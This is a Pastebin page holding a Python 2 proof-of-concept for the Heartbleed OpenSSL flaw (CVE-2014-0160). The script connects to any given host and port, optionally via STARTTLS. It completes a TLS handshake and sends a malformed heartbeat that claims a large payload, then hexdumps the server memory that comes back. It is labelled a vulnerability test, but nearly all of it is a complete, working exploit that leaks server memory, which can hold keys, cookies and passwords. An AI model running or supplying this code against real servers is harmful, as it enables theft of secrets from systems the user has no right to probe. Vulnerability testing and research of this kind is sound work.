Advertisement
AndrewHaxalot

hb-test.py

Apr 8th, 2014
158
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.82 KB | None | 0 0
  1. #!/usr/bin/env python2
  2.  
  3. # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
  4. # The author disclaims copyright to this source code.
  5.  
  6. import sys
  7. import struct
  8. import socket
  9. import time
  10. import select
  11. import re
  12. from optparse import OptionParser
  13.  
  14. options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
  15. options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
  16. options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS')
  17. options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output')
  18.  
  19. def h2bin(x):
  20.     return x.replace(' ', '').replace('\n', '').decode('hex')
  21.  
  22. hello = h2bin('''
  23. 16 03 02 00  dc 01 00 00 d8 03 02 53
  24. 43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
  25. bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
  26. 00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
  27. 00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
  28. c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
  29. c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
  30. c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
  31. c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
  32. 00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
  33. 03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
  34. 00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
  35. 00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
  36. 00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
  37. 00 0f 00 01 01                                  
  38. ''')
  39.  
  40. hb = h2bin('''
  41. 18 03 02 00 03
  42. 01 40 00
  43. ''')
  44.  
  45. def hexdump(s):
  46.     for b in xrange(0, len(s), 16):
  47.         lin = [c for c in s[b : b + 16]]
  48.         hxdat = ' '.join('%02X' % ord(c) for c in lin)
  49.         pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
  50.         print '  %04x: %-48s %s' % (b, hxdat, pdat)
  51.     print
  52.  
  53. def recvall(s, length, timeout=5):
  54.     endtime = time.time() + timeout
  55.     rdata = ''
  56.     remain = length
  57.     while remain > 0:
  58.         rtime = endtime - time.time()
  59.         if rtime < 0:
  60.             return None
  61.         r, w, e = select.select([s], [], [], 5)
  62.         if s in r:
  63.             data = s.recv(remain)
  64.             # EOF?
  65.             if not data:
  66.                 return None
  67.             rdata += data
  68.             remain -= len(data)
  69.     return rdata
  70.        
  71.  
  72. def recvmsg(s):
  73.     hdr = recvall(s, 5)
  74.     if hdr is None:
  75.         print 'Unexpected EOF receiving record header - server closed connection'
  76.         return None, None, None
  77.     typ, ver, ln = struct.unpack('>BHH', hdr)
  78.     pay = recvall(s, ln, 10)
  79.     if pay is None:
  80.         print 'Unexpected EOF receiving record payload - server closed connection'
  81.         return None, None, None
  82.     print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
  83.     return typ, ver, pay
  84.  
  85. def hit_hb(s):
  86.     s.send(hb)
  87.     while True:
  88.         typ, ver, pay = recvmsg(s)
  89.         if typ is None:
  90.             print 'No heartbeat response received, server likely not vulnerable'
  91.             return False
  92.  
  93.         if typ == 24:
  94.             print 'Received heartbeat response:'
  95.             hexdump(pay)
  96.             if len(pay) > 3:
  97.                 print 'WARNING: server returned more data than it should - server is vulnerable!'
  98.             else:
  99.                 print 'Server processed malformed heartbeat, but did not return any extra data.'
  100.             return True
  101.  
  102.         if typ == 21:
  103.             print 'Received alert:'
  104.             hexdump(pay)
  105.             print 'Server returned error, likely not vulnerable'
  106.             return False
  107.  
  108. def main():
  109.     opts, args = options.parse_args()
  110.     if len(args) < 1:
  111.         options.print_help()
  112.         return
  113.  
  114.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  115.     print 'Connecting...'
  116.     sys.stdout.flush()
  117.     s.connect((args[0], opts.port))
  118.  
  119.     if opts.starttls:
  120.         re = s.recv(4096)
  121.         if opts.debug: print re
  122.         s.send('ehlo starttlstest\n')
  123.         re = s.recv(1024)
  124.         if opts.debug: print re
  125.         if not 'STARTTLS' in re:
  126.             if opts.debug: print re
  127.             print 'STARTTLS not supported...'
  128.             sys.exit(0)
  129.         s.send('starttls\n')
  130.         re = s.recv(1024)
  131.    
  132.     print 'Sending Client Hello...'
  133.     sys.stdout.flush()
  134.     s.send(hello)
  135.     print 'Waiting for Server Hello...'
  136.     sys.stdout.flush()
  137.     while True:
  138.         typ, ver, pay = recvmsg(s)
  139.         if typ == None:
  140.             print 'Server closed connection without sending Server Hello.'
  141.             return
  142.         # Look for server hello done message.
  143.         if typ == 22 and ord(pay[0]) == 0x0E:
  144.             break
  145.  
  146.     print 'Sending heartbeat request...'
  147.     sys.stdout.flush()
  148.     s.send(hb)
  149.     hit_hb(s)
  150.  
  151. if __name__ == '__main__':
  152.     main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement